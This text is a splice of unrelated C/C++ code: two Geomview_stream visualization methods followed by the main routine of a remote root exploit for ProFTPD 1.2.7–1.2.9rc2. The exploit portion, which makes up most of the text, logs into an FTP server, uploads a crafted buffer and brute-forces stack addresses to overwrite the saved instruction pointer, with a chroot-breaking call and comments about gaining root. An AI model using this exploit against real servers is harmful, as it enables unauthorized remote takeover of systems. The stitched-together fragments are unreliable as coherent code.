void Geomview_stream::set_bg_color(const Color &c) { bool ascii_bak = set_ascii_mode(); *this << "(backcolor \"Camera\" " << double(c.r())/255.0 << double(c.g())/255.0 << double(c.b())/255.0 << ")"; set_ascii_mode(ascii_bak); }
void Geomview_stream::pickplane(const Bbox_3 &bbox) { bool bin_bak = set_binary_mode(); (*this) << "(geometry pickplane {QUAD BINARY\n" << 1 // here are the four corners << bbox.xmin() << bbox.ymin() << bbox.zmin() << bbox.xmin() << bbox.ymax() << bbox.zmin() << bbox.xmax() << bbox.ymax() << bbox.zmin() << bbox.xmax() << bbox.ymin() << bbox.zmin() // close the text bracket << "}) (pickable pickplane no)"; set_ascii_mode(bin_bak); }
int main(int argc,char **argv) { int sleepMode=0; char c; unsigned int stackStartAddr=STACK_START; if(argc<2) usage(argv[0]); while((c = getopt(argc, argv, "t:u:p:l:U:sP:S:"))!= EOF) { switch (c) { case 't': server=optarg; break; case 'u': user=optarg; break; case 'p': pass=optarg; break; case 'l': localIP=optarg; break; case 's': sleepMode=1; break; case 'U': strncpy(uploadPath,optarg,SIZE); break; case 'P': ftpPort=atoi(optarg); break; case 'S': stackStartAddr=strtoul(optarg, NULL, 16); break; default: usage(argv[0]); return 1; } } if(server==NULL || localIP==NULL) usage(argv[0]); printf("proftpd 1.2.7 - 1.2.9rc2 remote r00t exploit\n"); printf(" by Haggis ([email protected])\n"); doris_chroot_breaker(); for(stackWriteAddr=stackStartAddr; stackWriteAddr<STACK_END; stackWriteAddr+=4, attemptNumber++) { if(check_for_linefeed()==FAILURE) continue; retAddr=stackWriteAddr+200; // good enough for show business if((controlSock=connect_to_server(ftpPort))==FAILURE) { perror("\n\nFailing to connect to remote host\n"); exit(1); } if(login_to_server()==FAILURE) { close(controlSock); printf("\nERROR: Login failed.\n"); exit(1); } if(set_passive_mode(UPLOAD)==FAILURE) goto err; if(set_ascii_mode()==FAILURE) goto err; if(set_path_and_filename()==FAILURE) goto err; // create the buffer containing RET for this // brute-force iteration create_exploit_buffer(); if(upload_file()==FAILURE) goto err; close(controlSock); // Connect again, then login, set ASCII mode and download the exploit file. // This will trigger the overflow; as a result, we've // corrupted the memory pool of this session and when we // download the file again, the stack area will be overwritten // and we control the saved EIP. if((controlSock=connect_to_server(ftpPort))<0) { perror("\nFailed to connect to remote host\n"); exit(1); } login_to_server(user,pass); set_path_and_filename(); if(set_ascii_mode()==FAILURE) goto err; if(set_passive_mode(DOWNLOAD)==FAILURE) goto err; if(sleepMode) sleep(10); if(download_file(NORMAL_DOWNLOAD)==FAILURE) goto err; // Finally, read the file again. This will trigger the stack // overwrite (NOT the overflow, that happened earlier). We could // control EIP at this point and r00t may be only heartbeat away... if(set_passive_mode(DOWNLOAD)==FAILURE) goto err; if(download_file(EXPLOIT_DOWNLOAD)==FAILURE) goto err; err: close(controlSock); } // This is only reached if the bruteforce fails. // delete the exploit files here printf("\n\nNo r00t for you today I'm afraid.\n"); exit(1); }